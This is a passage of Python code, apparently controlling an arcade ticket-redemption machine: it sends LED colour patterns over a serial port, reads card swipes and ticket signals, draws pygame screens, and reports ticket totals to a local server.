pcorto1.append(0x30)
pcorto1.append(0x01)
pcorto1.append(0x27)#35 electronico // 60 fisico
# pcorto.append(0x10)
serie.write(pcorto1)
serie.flushOutput()
time.sleep(1)
serie.write(activot)
serie.flushOutput()
time.sleep(1)
rojo=bytearray()
rojo.append(0x24)
rojo.append(0x92)
rojo.append(0x49)
rojo.append(0x24)
rojo.append(0x92)
rojo.append(0x49)
rojo.append(0x27)
rojo1=bytearray()
rojo1.append(0x24)
rojo1.append(0x49)
rojo1.append(0x24)
rojo1.append(0x92)
rojo1.append(0x49)
rojo1.append(0x27)
rojo1.append(0x92)
rojo2=bytearray()
rojo2.append(0x24)
rojo2.append(0x24)
rojo2.append(0x92)
rojo2.append(0x49)
rojo2.append(0x27)
rojo2.append(0x92)
rojo2.append(0x49)
#activot.append(0x00)
#activot.append(0x00)
#activot.append(0x00)
verde=bytearray()
verde.append(0x24)
verde.append(0x80)
verde.append(0x00)
verde.append(0x00)
verde.append(0x80)
verde.append(0x00)
verde.append(0x00)
verde1=bytearray()
verde1.append(0x24)
verde1.append(0x10)
verde1.append(0x00)
verde1.append(0x00)
verde1.append(0x00)
verde1.append(0x00)
verde1.append(0x00)
verde2=bytearray()
verde2.append(0x24)
verde2.append(0x02)
verde2.append(0x00)
verde2.append(0x00)
verde2.append(0x00)
verde2.append(0x00)
verde2.append(0x00)
verde3=bytearray()
verde3.append(0x24)
verde3.append(0x00)
verde3.append(0x40)
verde3.append(0x00)
verde3.append(0x00)
verde3.append(0x00)
verde3.append(0x00)
verde4=bytearray()
verde4.append(0x24)
verde4.append(0x00)
verde4.append(0x08)
verde4.append(0x00)
verde4.append(0x00)
verde4.append(0x00)
verde4.append(0x00)
verde5=bytearray()
verde5.append(0x24)
verde5.append(0x00)
verde5.append(0x01)
verde5.append(0x00)
verde5.append(0x00)
verde5.append(0x00)
verde5.append(0x00)
verde5=bytearray()
verde5.append(0x24)
verde5.append(0x00)
verde5.append(0x01)
verde5.append(0x00)
verde5.append(0x00)
verde5.append(0x00)
verde5.append(0x00)
verde6=bytearray()
verde6.append(0x24)
verde6.append(0x00)
verde6.append(0x00)
verde6.append(0x20)
verde6.append(0x00)
verde6.append(0x00)
verde6.append(0x00)
verde7=bytearray()
verde7.append(0x24)
verde7.append(0x00)
verde7.append(0x00)
verde7.append(0x04)
verde7.append(0x00)
verde7.append(0x00)
verde7.append(0x00)
verde8=bytearray()
verde8.append(0x24)
verde8.append(0x00)
verde8.append(0x00)
verde8.append(0x00)
verde8.append(0x80)
verde8.append(0x00)
verde8.append(0x00)
verde9=bytearray()
verde9.append(0x24)
verde9.append(0x00)
verde9.append(0x00)
verde9.append(0x00)
verde9.append(0x10)
verde9.append(0x00)
verde9.append(0x00)
verde10=bytearray()
verde10.append(0x24)
verde10.append(0x00)
verde10.append(0x00)
verde10.append(0x00)
verde10.append(0x02)
verde10.append(0x00)
verde10.append(0x00)
verde11=bytearray()
verde11.append(0x24)
verde11.append(0x00)
verde11.append(0x40)
verde11.append(0x00)
verde11.append(0x00)
verde11.append(0x40)
verde11.append(0x00)
ee=bytearray()
ee.append(0x24)
ee.append(0x00)
ee.append(0x00)
ee.append(0x00)
ee.append(0x00)
ee.append(0x00)
ee.append(0x00)
serie.write(ee)
time.sleep(1)
#serie.write(activot)
#time.sleep(.300)
cargo()
def tipo4():
if True:
serie.write(bytearray([0x24,0x01,0x00,0x00,0x00,0x00,0x00]))
time.sleep(00.080)
serie.write(bytearray([0x24,0x10,0x00,0x00,0x00,0x00,0x00]))
time.sleep(00.080)
serie.write(bytearray([0x24,0x11,0x00,0x00,0x00,0x00,0x00]))
time.sleep(00.080)
serie.write(bytearray([0x24,0x00,0x01,0x00,0x00,0x00,0x00]))
time.sleep(00.080)
serie.write(bytearray([0x24,0x00,0x10,0x00,0x00,0x00,0x00]))
time.sleep(00.080)
serie.write(bytearray([0x24,0x00,0x11,0x00,0x00,0x00,0x00]))
time.sleep(00.080)
serie.write(bytearray([0x24,0x00,0x00,0x01,0x00,0x00,0x00]))
time.sleep(00.080)
serie.write(bytearray([0x24,0x00,0x00,0x10,0x00,0x00,0x00]))
time.sleep(00.080)
serie.write(bytearray([0x24,0x00,0x00,0x11,0x00,0x00,0x00]))
time.sleep(00.080)
serie.write(bytearray([0x24,0x00,0x00,0x00,0x01,0x00,0x00]))
time.sleep(00.080)
serie.write(bytearray([0x24,0x00,0x00,0x00,0x10,0x00,0x00]))
time.sleep(00.080)
serie.write(bytearray([0x24,0x00,0x00,0x00,0x11,0x00,0x00]))
time.sleep(00.080)
serie.write(bytearray([0x24,0x00,0x00,0x00,0x00,0x01,0x00]))
time.sleep(00.080)
serie.write(bytearray([0x24,0x00,0x00,0x00,0x00,0x10,0x00]))
time.sleep(00.080)
serie.write(bytearray([0x24,0x00,0x00,0x00,0x00,0x11,0x00]))
time.sleep(00.080)
serie.write(bytearray([0x24,0x00,0x00,0x00,0x00,0x00,0x01]))
time.sleep(00.080)
serie.write(bytearray([0x24,0x00,0x00,0x00,0x00,0x00,0x10]))
time.sleep(00.080)
serie.write(bytearray([0x24,0x00,0x00,0x00,0x00,0x00,0x11]))
time.sleep(00.080)
def tipo3():
if True:
serie.write(bytearray([0x24,0x01,0x00,0x10,0x00,0x00,0x01]))
time.sleep(00.100)
serie.write(bytearray([0x24,0x00,0x10,0x00,0x01,0x00,0x10]))
time.sleep(00.100)
serie.write(bytearray([0x24,0x01,0x00,0x10,0x00,0x00,0x01]))
time.sleep(00.100)
serie.write(bytearray([0x24,0x00,0x10,0x00,0x01,0x00,0x10]))
time.sleep(00.100)
serie.write(bytearray([0x24,0x01,0x00,0x10,0x00,0x00,0x01]))
time.sleep(00.100)
serie.write(bytearray([0x24,0x00,0x10,0x00,0x01,0x00,0x10]))
time.sleep(00.100)
serie.write(bytearray([0x24,0x01,0x00,0x10,0x00,0x00,0x01]))
time.sleep(00.100)
serie.write(bytearray([0x24,0x00,0x10,0x00,0x01,0x00,0x10]))
time.sleep(00.100)
def tipo2():
if True:
serie.write(verde)
time.sleep(00.070)
serie.write(verde11)
time.sleep(00.070)
#serie.write(verde)
#time.sleep(00.070)
#serie.write(verde11)
#time.sleep(00.070)
#serie.write(verde)
#time.sleep(00.070)
#serie.write(verde11)
#time.sleep(00.070)
#serie.write(verde)
#time.sleep(00.070)
#serie.write(verde11)
#time.sleep(00.070)
def tipo1():
if True:
##confirmacion=False
serie.write(verde)
#while confirmacion==False:
#obtengoOk()
####print(confirmacion)
time.sleep(00.070)
serie.write(verde1)
time.sleep(00.070)
serie.write(verde2)
time.sleep(00.070)
serie.write(verde3)
time.sleep(00.070)
serie.write(verde4)
time.sleep(00.070)
serie.write(verde5)
time.sleep(00.070)
serie.write(verde6)
time.sleep(00.070)
serie.write(verde7)
time.sleep(00.070)
serie.write(verde8)
time.sleep(00.070)
serie.write(verde9)
time.sleep(00.070)
serie.write(verde10)
time.sleep(00.070)
serie.write(verde11)
time.sleep(00.070)
serie.write(verde11)
time.sleep(00.070)
serie.write(verde10)
time.sleep(00.070)
serie.write(verde9)
time.sleep(00.070)
serie.write(verde8)
time.sleep(00.070)
serie.write(verde7)
time.sleep(00.070)
serie.write(verde6)
time.sleep(00.070)
serie.write(verde5)
time.sleep(00.070)
serie.write(verde4)
time.sleep(00.070)
serie.write(verde3)
time.sleep(00.070)
serie.write(verde2)
time.sleep(00.070)
serie.write(verde1)
time.sleep(00.070)
serie.write(verde)
time.sleep(00.070)
dato = serie.readline(15)
#if dato.decode('utf-8')=='U':
# confirmacion=True
#if len(dato.decode('utf-8'))>14:
###print(dato.decode('utf-8'))
def GiroIndividual(aa,bb,cc,direccion):
global confirmacion
global ctk
global tarjeta
global lcolor1
global lcolor2
global lcolor3
a=""
if True:
a24='00100100'
#color='000000000000000000000000000000000000000000000000'
xx=0
if xa==0:
lcolor1=aa
lcolor2=bb
lcolor3=cc
else:
lcolor1=lcolor1+3
lcolor2=lcolor2+3
lcolor3=lcolor3+3
color=''
##confirmacion=False
if xa<16:
####print(xa)
while xx< 48:
if xx==(lcolor1)-1:
if direccion=='d':
color=color+'1'
else:
color='1'+color
else:
if direccion=='d':
color=color+'0'
else:
color='0'+color
if xx==(lcolor2)-1:
if direccion=='d':
color=color+'1'
else:
color='1'+color
else:
if direccion=='d':
color=color+'0'
else:
color='0'+color
if xx==(lcolor3)-1:
if direccion=='d':
color=color+'1'
else:
color='1'+color
else:
if direccion=='d':
color=color+'0'
else:
color='0'+color
xx=xx+3
#color=color+lcolor1+lcolor2+lcolor3
###print(color)
envio=a24+color
a=hex(int(envio,2))
a=bytearray.fromhex(a[2:16])
####print(a)
if confirmacion==True:
#confirmacion=False
#serie.flushInput()
serie.write(bytes(a))
#else:
#break
#if lenn(tarjeta)>0:
# time.sleep(00.100)
# return
#while confirmacion==False:
#
# color=''
#llego=serie.read(1).decode('utf-8')
#serie.flushInput()
####print(llego)
#if llego=='U':
#confirmacion
# llego=''
# confirmacion=True
#if len(llego)>14:
#reciboTarjeta
# p=llego.find(';',0)
# h=15+p
# if p>=0:
# ctk=0
# ###print(llego[p:h])
# confirmacion=True
# llego=''
#if llego=='@':
# llego=''
# ctk=ctk+1
# ###print(ctk)
# confirmacion=True
#if len(llego)>0 and confirmacion==False:
#llego=serie.readline(15).decode('utf-8')
#serie.flushInput()
# #confirmacion=False
# tarjeta=tarjeta+llego
# llego=''
# ###print(tarjeta)
# if len(tarjeta)>14:
# ###print(tarjeta)
#tarjeta=''
# confirmacion=True
#time.sleep(00.060)
#color=''
#xx=0
#lcolor1=lcolor1+3
#lcolor2=lcolor2+3
#lcolor3=lcolor3+3
####print(lcolor1)
confirmacion=True
###print('entre')
#GiroIndividual(aa,bb,cc,direccion)
#---------------------------------------
#---------------------------------------
def GiroEspecial(cc,c1,c2,c3,c4,c5,c6,c7,c8,c9,c10,c11,c12,c13,c14,c15,c16,d):
global confirmacion
if True:
if cc=='24':
a24='00100100'
if cc=='25':
a24='00100101'
if cc=='28':
a24='00101000'
#color='000000000000000000000000000000000000000000000000'
xx=0
#If d=='d':
color=c1+c2+c3+c4+c5+c6+c7+c8+c9+c10+c11+c12+c13+c14+c15+c16
#else:
# color=c16+c15+c14+c13+c12+c11+c10+c9+c8+c7+c6+c5+c4+c3+c2+c1
###print(color)
envio=a24+color
a=hex(int(envio,2))
a=bytearray.fromhex(a[2:16])
####print(a)
if confirmacion==True:
#confirmacion=False
serie.write(bytes(a))
#confirmacion=True
#----------------------------------------
def GiroPared(aa,bb,cc,direccion,cual):
global confirmacion
global ctk
global tarjeta
global lcolor1
global lcolor2
global lcolor3
color=''
a=""
if True:
a24='00100100'
#color='000000000000000000000000000000000000000000000000'
xx=0
if cual==1:
cual=12
if cual==2:
cual=24
if cual==3:
cual=36
if cual==4:
cual=48
#if xa==0:
lcolor1=aa
lcolor2=bb
lcolor3=cc
#else:
# lcolor1=lcolor1+3
# lcolor2=lcolor2+3
# lcolor3=lcolor3+3
color=''
##confirmacion=False
if True:
####print(xa)
while xx< cual:
if xx==(lcolor1)-1:
color=color+'1'
else:
color=color+'0'
if xx==(lcolor2)-1:
color=color+'1'
else:
color=color+'0'
if xx==(lcolor3)-1:
color=color+'1'
else:
color=color+'0'
xx=xx+3
lcolor1=lcolor1+3
lcolor2=lcolor2+3
lcolor3=lcolor3+3
if cual==12:
e=0
while e<36:
color=color+'0'
e=e+1
if cual==24:
e=0
while e<24:
color=color+'0'
e=e+1
if cual==36:
e=0
while e<12:
color=color+'0'
e=e+1
###print(color)
envio=a24+color
a=hex(int(envio,2))
a=bytearray.fromhex(a[2:16])
if confirmacion==True:
#confirmacion=False
serie.write(bytes(a))
confirmacion=True
#----------------------------------------
def ColorFijo(b,r,g):
#global confirmacion
global ctk
global tarjeta
global EnvioPuerto
a=""
if True:
a24='00100100' #termina en 00=24 / 01=25
color='000000000000000000000000000000000000000000000000'
xx=0
lcolor1=b
lcolor2=r
lcolor3=g
color=''
xa=0
while xx<48:
####print(xa)
if xx==(lcolor1)-1:
color=color+'1'
else:
color=color+'0'
if xx==(lcolor2)-1:
color=color+'1'
else:
color=color+'0'
if xx==(lcolor3)-1:
color=color+'1'
else:
color=color+'0'
xx=xx+3
lcolor1=lcolor1+3
lcolor2=lcolor2+3
lcolor3=lcolor3+3
envio=''
a=''
envio=str(a24) + str(color)
##print(len(color))
#print (len(a24))
##print(len(envio))
#Anda 1
a=hex(int(envio,2))
a=bytearray.fromhex(a[2:16])
#Anda 2
#a=bytearray([int(envio[i:i+8],2)for i in range(0,len(envio),8)])
#a=int(envio,2).to_bytes(8,'big')
##print(a)
#if confirmacion==True:
#if PagandoTk==False:
##confirmacion=False
#serie.flushInput()
#serie.write(bytes(a))
#while len(EnvioPuerto)>0:
# a=1
while EnvioPuerto!='':
b=1
#time.sleep(.050)
##print("envia luz colorfijo")
EnvioPuerto=a#bytearray([0x28,0x10,0x10,0x10,0x10,0x10,0x01])#bytes(a)
#while EnvioPuerto!='':
# b=1
def luz2017(cual):
global EnvioPuerto
global punto
global apb
global controlluces
global ConfirmacionTarjeta
if apb=='':
apb=0
if cual=='paseo2':
while EnvioPuerto!='' :
b=1
if punto==0: #and tarjeta=='':
###print("yo1")
#EnvioPuerto=bytearray([0x25,0x11,0x11,0x11,0x11,0x11,0x11])#bytes(a)
EnvioPuerto=ColorRojo#ColorRojo#bytearray([0x25,0xFF,0xFF,0xFF,0xFF,0xFF,0xF8])#bytes(a)
if cual=='paseo':
#while EnvioPuerto!='':
# b=1
if controlluces==1 and EnvioPuerto=='' and punto==0 and tarjeta=='':#tarjeta=='' :#punto==0 and tarjeta=='' and ctk==0:
#print("yo2")
controlluces=0
EnvioPuerto=bytearray([0x25,0x09,0x00,0x09,0x00,0x49,0xF8])#bytearray([0x28,0x10,0x11,0x01,0x02,0x05,0x09])#bytes(a)
time.sleep(0.9)
#controlluces=1
return
#time.sleep(1.5)
if cual=='verde':
while EnvioPuerto!='':
b=1
#punto=0
EnvioPuerto=ColorVerde
if cual=='pagoblanco':
while EnvioPuerto!='':
b=1
#punto=0
EnvioPuerto=bytearray([0x24,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF])
if cual=='pagando':
while EnvioPuerto!='':
b=1
#punto=0
EnvioPuerto=bytearray([0x25,0x92,0x49,0x24,0x92,0x49,0x27])
if cual=='terminopago':
while EnvioPuerto!='':
b=1
# punto=0
EnvioPuerto=ColorVerde
while EnvioPuerto!='':
b=1
serie.flush()
time.sleep(0.2)
ConfirmacionTarjeta=False
while ConfirmacionTarjeta==False:
serie.write(bytes(activot))
time.sleep(0.200)
#EnvioPuerto=activot
#while EnvioPuerto!='':
# b=1
#EnvioPuerto=bytearray([0x24,0x00,0x00,0x00,0x00,0x00,0x00])#bytes(a)
#while EnvioPuerto!='':
# b=1
if cual=='rojo':
while EnvioPuerto!='':
b=1
#punto=0
EnvioPuerto=ColorRojo
#while EnvioPue
if cual=='apagado':
while EnvioPuerto!='':
b=1
EnvioPuerto=bytearray([0x24,0x00,0x00,0x00,0x00,0x00,0x00])#bytes(a)
#while EnvioPuerto!='':
# b=1
def colorfijo2(p,c1,c2,c3,c4):
global EnvioPuerto
#global confirmacion
global ctk
global tarjeta
#a=""
if True:
if p=='24':
a24='00100100'
if p=='25':
a24='00100101'
if p=='28':
a24='00101000'
#a24='00101000' #termina en 00=24 / 01=25
color='000000000000000000000000000000000000000000000000'
xx=0
color=''
xa=0
while xx<48:
####print(xa)
if xx<12:
color=color+c1
if xx<24:
color=color+c2
if xx<36:
color=color+c3
if xx<48:
color=color+c4
xx=xx+3
envio=a24+color
a=hex(int(envio,2))
a=bytearray.fromhex(a[2:16])
####print(a)
#if confirmacion==True:
# #confirmacion=False
serie.flush()
time.sleep(.050)
serie.write(bytes(a))
#while len(EnvioPuerto)>0:
# a=1
#EnvioPuerto=bytes(a)
#while EnvioPuerto!='':
# b=1
#time.sleep(.050)
##print("envia luz #colorfijo2")
#if punto==0:
# EnvioPuerto=a#bytes(a)
def mprueba():
global xa
global jluces
#xa=0
if True:
###print(xa)
if confirmacion==True and PagandoTk==False and len(tarjeta)==0:
if jluces==0:
#GiroIndividual(1,1,1,'d')
#GiroPared(0,1,1,'d',1)
GiroEspecial('25',
'001',
'000',
'000',
'000',
'000',
'010',
'000',
'000',
'000',
'100',
'000',
'000',
'000',
'000',
'000',
'000','d')
xa=xa+1
if xa>=1:
xa=0
jluces=jluces+1
if confirmacion==True and PagandoTk==False and len(tarjeta)==0:
if jluces==1:
#GiroEspecial('25',
# '011',
# '011',
# '011',
# '011',
# '011',
# '011',
# '011',
# '011',
# '011',
# '010',
# '010',
# '100',
# '100',
# '001',
# '001',
# '011','d')
GiroPared(1,0,1,'i',4)
xa=xa+1
if xa>=8:
xa=0
jluces=jluces+1
if confirmacion==True and PagandoTk==False and len(tarjeta)==0:
if jluces==2:
GiroEspecial('25',
'001',
'000',
'000',
'000',
'000',
'010',
'000',
'000',
'000',
'000',
'100',
'000',
'000',
'000',
'000',
'000','d')
xa=xa+1
if xa>=1:
xa=0
jluces=jluces+1
if confirmacion==True and PagandoTk==False and len(tarjeta)==0:
if jluces==3:
GiroIndividual(0,0,1,'d')
xa=xa+1
if xa>=1:
xa=0
jluces=jluces+1
if confirmacion==True and PagandoTk==False:
if jluces==5:
GiroEspecial('25',
'010',
'010',
'000',
'000',
'100',
'100',
'000',
'000',
'010',
'010',
'000',
'000',
'000',
'000',
'000',
'000','d')
xa=xa+1
if xa>=1:
xa=0
jluces=jluces+1
if confirmacion==True and PagandoTk==False and len(tarjeta)==0:
if jluces==4:
#GiroIndividual(1,0,0,'i')
#colorfijo2('28','000','000','000','001')
xa=xa+1
if xa>=1:
xa=0
jluces=jluces+1
if confirmacion==True and PagandoTk==False and len(tarjeta)==0:
if jluces==6:
DosMundos()
xa=xa+1
if xa>=10:
xa=0
jluces=0
def EscuchoPuerto():
global acumulador
global PagandoTk
global ctk
global TimeOut
global confirmacion
global EntrarTimer
global HTimeOut
global SinNada
global apb
global tarjeta
global EnvioPuerto
global punto
global recibi
global luz
global controlluces
global tarjetalista
global ConfirmacionCoin
global ConfirmacionTarjeta
global confirmacionMudo
#global screen
tarjeta=''
EntrarTimer=False
doblev=''
apb=0
acumulador=''
recibi=''
luz='no'
while True:
try:
a=serie.read(1).decode('utf-8')
#serie.flushInput()
if len(a)>0:
#print(a)
recibi=recibi+a
if recibi.find('W',0)>-1:
doblev='W'
if TerminoOperacion==1:
acumulador=acumulador+a
#else:
# if controlluces==1:
# luz2017('paseo')
if a=='Z':
ConfirmacionTarjeta=True
if a=='Y':
ConfirmacionCoin=1
if a=='X':
tarjetalista=1
if a=='V':# and ctk==0:
controlluces=1
if a=='U':
confirmacion=True
if a=='T':
confirmacionMudo=True
print('Mudo Ok')
if recibi.find('U',0)>-1:
###print("confirmo")
confirmacion=True
#EnvioPuerto=''
if recibi.find('V',0)>-1 and ctk==0:
controlluces=1
if recibi.find('X',0)>-1:
tarjetalista=1
#return
if a==";" and tarjeta=='':
serie.flushOutput()
#controlluces=0
if punto==0:
#EnvioPuerto=''
#controlluces=1
#while EnvioPuerto!='':
b=1
#EnvioPuerto=desactivot
#while EnvioPuerto!='':
# b=1
#serie.flushOutput()
#EnvioPuerto=''
#serie.write(bytes(desactivot))
punto=1
ar=recibi.find('@',0)
if ar>-1 and UltTar!='':
if PagandoTk==False:
#if confirmacion==True:
EnvioPuerto=desactivot
#serie.write(desactivot)
EntrarTimer=False
PagandoTk=True
controlluces=0
TimeOut=False
esto=recibi
recibi=''
x=0
while x< len(esto):
esta=esto.find("@",x,x+1)
if esta>-1:
ctk=ctk+1
x=x+1
HTimeOut=datetime.now()+timedelta(seconds=4)
#colorfijo2('24','100','000','100','000')
#luz=1
#HTimeOut=datetime.now()+timedelta(seconds=3)
#noviembre2017
recibi=''
#acumulador=''
HTimeOut=datetime.now()+timedelta(seconds=3)
#if confirmacion==True:
# colorfijo2('25','100','000','100','000')
PagandoTk=False
#break
###print(ctk)
#-----PARA PAGO FISICO---
ar=recibi.find('A',0)
if ar>-1 and UltTar!='':
if PagandoTk==False:
#if confirmacion==True:
EnvioPuerto=desactivot
#serie.write(desactivot)
EntrarTimer=False
PagandoTk=True
controlluces=0
TimeOut=False
esto=recibi
recibi=''
x=0
while x< len(esto):
esta=esto.find("A",x,x+1)
if esta>-1:
ctk=ctk+1
x=x+1
HTimeOut=datetime.now()+timedelta(seconds=4)
#colorfijo2('24','100','000','100','000')
#luz=1
#HTimeOut=datetime.now()+timedelta(seconds=3)
#noviembre2017
recibi=''
#acumulador=''
HTimeOut=datetime.now()+timedelta(seconds=3)
#if confirmacion==True:
# colorfijo2('25','100','000','100','000')
PagandoTk=False
#break
###print(ctk)
recibi=''
#if confirmacion==True and controlluces==0 and punto==0 and ctk==0:
# controlluces=1
#if controlluces==0:
# MiLuz()
except:
print("murio serie")
serie = serial.Serial('/dev/serial0', 9600, timeout=0.2, writeTimeout=0)
continue
def PuertoSerie():
global acumulador
global PagandoTk
global ctk
global TimeOut
global confirmacion
global EntrarTimer
global HTimeOut
global SinNada
global apb
global tarjeta
global EnvioPuerto
global UltTar
global controlluces
global TerminoOperacion
global ConfirmacionTarjeta
#global screen
tarjeta=''
EntrarTimer=False
apb=0
#acumulador=''
while True:
a=''
doblev=''
if len(acumulador)>0: #len(a)==0 and
pp=acumulador.find('?',0)
if pp>0:#and controlluces==0:
serie.flush()
EnvioPuerto=''
p=acumulador.find(';',0)
h=p+15
#[p:h]
mtar=acumulador[p:h]
print(mtar)
if len(mtar)>=15 and TerminoOperacion==1:# and controlluces==0:
print("entra tarjeta" + str(mtar))
acumulador=''
#MuestraTarjeta(mtar)
controlluces=0
tarjeta=mtar
else:
#TerminoOperacion=0
print("NO entra tarjeta")
if len(mtar)>=15:
acumulador=''
if acumulador=='' and PagandoTk==True :
PagandoTk=False
b=1
if PagandoTk==False and int(ctk)>0 and TimeOut==True:
FinalizoTks()
#ctk=0
if ctk==0:
TerminoPago()
if acumulador.find('W',0)>-1:
print('W')
acumulador=''
doblev='w'
if tarjeta=='' and TerminoOperacion==1 and controlluces==1:
#while EnvioPuerto!='':
# time.sleep(0.001)
#controlluces=0
myfont =pygame.font.Font("super.ttf",35)
bg = pygame.image.load("fondot.jpg")
screen.blit(bg,(0,0))
if LabelPase=='Pase Su Tarjeta':
TIT='TARJETA INVALIDA'
esto="Pase nuevamente su tarjeta"
else:
TIT='INVALID CARD'
esto="Slide your card again"
label = myfont.render(TIT, 1, (0,255,20))
screen.blit(label,(((infoObject.current_w - label.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)-40))
myfont =pygame.font.Font("super.ttf",25)
label1 = myfont.render(esto, 1, (0,255,20))
screen.blit(label1,(((infoObject.current_w - label1.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)+40))
pygame.display.flip()
pygame.display.update()
time.sleep(.100)
serie.flush()
serie.write(bytes(bytearray([0x25,0x49,0x00,0x00,0x49,0x00,0x00])))
time.sleep(1.0)
serie.flush()
#time.sleep(0.030)
#confirmacion=False
#serie.write(bytes(activot))
#while confirmacion==False:
# b=1
serie.flush()
time.sleep(0.100)
ConfirmacionTarjeta=False
while ConfirmacionTarjeta==False:
serie.write(bytes(activot))
time.sleep(0.100)
#controlluces=1
#doblev=''
#acumulador=''
PantFull()
#tarjetalista=1
else:
#if tarjeta=='':# and controlluces==1:
serie.flush()
time.sleep(0.500)
ConfirmacionTarjeta=False
#serie.write(bytes(activot))
while ConfirmacionTarjeta==False:
serie.write(bytes(activot))
time.sleep(0.100)
#controlluces=1
#doblev=''
#acumulador=''
#tarjetalista=1
if controlluces==1:# or doblev=='w':# and tarjeta=='' and ctk==0:# and acumulador.find('W',0)==0:
#serie.flush()
#confirmacion=False
#print('mando luz')
luz2017('paseo')
#while confirmacion==False:
# b=1
#confirmacion=False
#serie.flush()
#serie.write(bytes(activot))
#while confirmacion==False:
# b=1
def Pantalla():
#aca esta loop visual
#pygame.display.update()
while True:
#totalpagar=ctk
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.mouse.set_visible(1)
os.system('setterm -cursor on')
pygame.quit()
quit()
sys.exit()
break
elif event.type == pygame.KEYDOWN:
###print(event.key)
if event.key == 27:
pygame.mouse.set_visible(1)
os.system('setterm -cursor on')
pygame.quit()
sys.exit()
quit()
break
#------ PYGAME------
# #screen.fill((0,0,0))
# #pygame.display.flip()
# #---------------------------------------------
def TerminoPago():
global EnvioPuerto
global controlluces
global ConfirmacionTarjeta
while EnvioPuerto!='':
b=1
ConfirmacionTarjeta=False
while ConfirmacionTarjeta==False:
serie.write(bytes(activot))
time.sleep(0.200)
#EnvioPuerto=
PantFull()
#EnvioPuerto=activot
controlluces=1
#confirmacion=True
def PagoTks():
global HTimeOut
#HTimeOut=datetime.now()+timedelta(seconds=3)
#TSaldo.config(text="Paying E-Tks",fg="blue")
#Saldo.config(text=ctk,fg="green")
#TVip.config(text="")
#Vip.config(text="")
HTimeOut=datetime.now()+timedelta(seconds=3)
def FinalizoTks():
global ctk
global PagandoTk
global TimeOut
global ultctk
global EnvioPuerto
global PantallaPago
while EnvioPuerto!='':
b=1
EnvioPuerto=bytearray([0x30,0x01,0x27])#3r byte es para fisico o electronico, 35 es elec y 60 fisico
if ctk>0 and UltTar!='':
try:
# Create a TCP/IP socket
PantallaPago=1
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect the socket to the port where the server is listening
server_address = (str(IP),5000)#192.168.2.50 -- IAAPA
##print('connecting to %s port %s' % server_address)
sock.settimeout(3.25)
sock.connect(server_address)
# Send data #P'+UltTar[:-1]+{0:4}.format(str(ctk))#NumMaq + tarjeta #tarjeta.get() #'C;1921000005618'
ttk2018=str(hex(ctk)[2:]).upper()
message = MiMac+','+MiIp+','+NumMaq+'#'+UltTar[:-1] + str(ttk2018).zfill(4) +'99'#NumMaq + tarjeta #tarjeta.get() #'C;1921000005618'#'0055#;47900089307660002F4'
#print('sending "%s"' % message)#'{0:04}'.format(str(ctk))
#print('{0:04}'.format(str(ctk)))
sock.settimeout(1.25)
sock.sendall(message.encode(encoding='UTF-8',errors='ignore'))
# Look for the response
amount_received = 0
amount_expected = 1#len(message)
data=''
yat=datetime.now()
hastat=datetime.now()+timedelta(milliseconds=2000)
#amount_received < amount_expected and
while hastat > yat and data=='':
data = sock.recv(48)
#print(data)
if data:
#ctk=0
message='103'
sock.sendall(message.encode(encoding='UTF-8',errors='ignore'))
except:
##print('error al conectar')
b=1
finally:
#tarjeta=''
#punto=0
#haytarjeta=0
##print('closing socket')
sock.close()
screen.fill((0,0,0))
bg = pygame.image.load("fondo.jpg")
screen.blit(bg,(0,0))
#myfont = pygame.font.SysFont("monospace", 45)
myfont =pygame.font.Font("super.ttf",45)
#label = myfont.render("YOU WIN "+ str(ctk) + " Tks!", 1, (0,180,0))
label = myfont.render(LabelPago, 1, (0,255,23))
screen.blit(label,(((infoObject.current_w - label.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)-40))
myfont =pygame.font.Font("super.ttf",70)
label1 = myfont.render(str(ctk), 1, (0,255,20))
screen.blit(label1,(((infoObject.current_w - label1.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)+40))
pygame.display.flip()
pygame.display.update()
ultctk=0
ctk=0
PagandoTk=False
TimeOut=False
colorfijo2('28','000','000','100','100')
## while EnvioPuerto!='':
## b=1
## EnvioPuerto=bytearray([0x30,0x01,0x35])
time.sleep(2)
#ctk=0
while EnvioPuerto!='':
b=1
EnvioPuerto=bytearray([0x30,0x01,0x27])
PantFull()
PantallaPago=0
def MuestroPagoTk():
global contador
global totalpagar
global ctk
global apb
global confirmacion
global luz
global controlluces
contador=0
totalpagar=0
luz=0
apb=1
global ultctk
#pygame.mixer.music.load("/home/pi/Desktop/etk.mp3")
#while pygame.mixer.music.get_busy() == True:
# continue
utlctk=0
while True:
if ctk>0 and TimeOut==False and UltTar!='' and PantallaPago==0: #and and ctk>utlctk:
if utlctk==0:
controlluces=1
utlctk=ctk
#pygame.mixer.music.play()
#time.sleep(1)
#screen.fill(white)
#if ctk<5:
screen.fill((0,0,0))
bg = pygame.image.load("fraspitk.jpg")
screen.blit(bg,(0,0))
#myfont = pygame.font.SysFont("monospace", 55)
myfont =pygame.font.Font("super.ttf",42)
label = myfont.render(LabelPagando, 1, (255,255,255))
screen.blit(label,(((infoObject.current_w - label.get_width()) / 2),70))
#myfont = pygame.font.SysFont("monospace", 90)
myfont =pygame.font.Font("super.ttf",95)
esto= str(ctk)
label1 = myfont.render(esto, 1, (0,255,20))
screen.blit(label1,(((infoObject.current_w - label1.get_width()) / 2), ((infoObject.current_h - label1.get_height()) / 2)+55))#(label, (((infoObject.current_w - label.get_width()) / 2),160 ))
pygame.display.flip()
pygame.display.update()
controlluces=0
if apb==1 :#and controlluces == 1:
colorfijo2('24','100','111','100','111')
#controlluces=0
apb=0
if apb==0: #and controlluces == 1:
#luz=1
colorfijo2('24','111','100','111','100')
#controlluces=0
apb=1
#colorfijo2('25','000','100','000','000')
luz=0
#time.sleep(1)
#if ctk<10:
# ColorFijo(1,0,0)
def PantFull():
global EnvioPuerto
global ctk
global punto
global tarjeta
global controlluces
global TerminoOperacion
global ConfirmacionTarjeta
global tarjetalista
#infoObject = pygame.display.Info()
#screen=pygame.display.set_mode((infoObject.current_w, infoObject.current_h))
screen.fill((0,0,0))
#pygame.display.update()
bg = pygame.image.load("fraspi1.jpg")
#time.sleep(.050)
screen.blit(bg,(0,0))
# initialize font; must be called after 'pygame.init()' to avoid 'Font not Initialized' error
myfont =pygame.font.Font("super.ttf",30) #pygame.font.SysFont("monospace", 35)
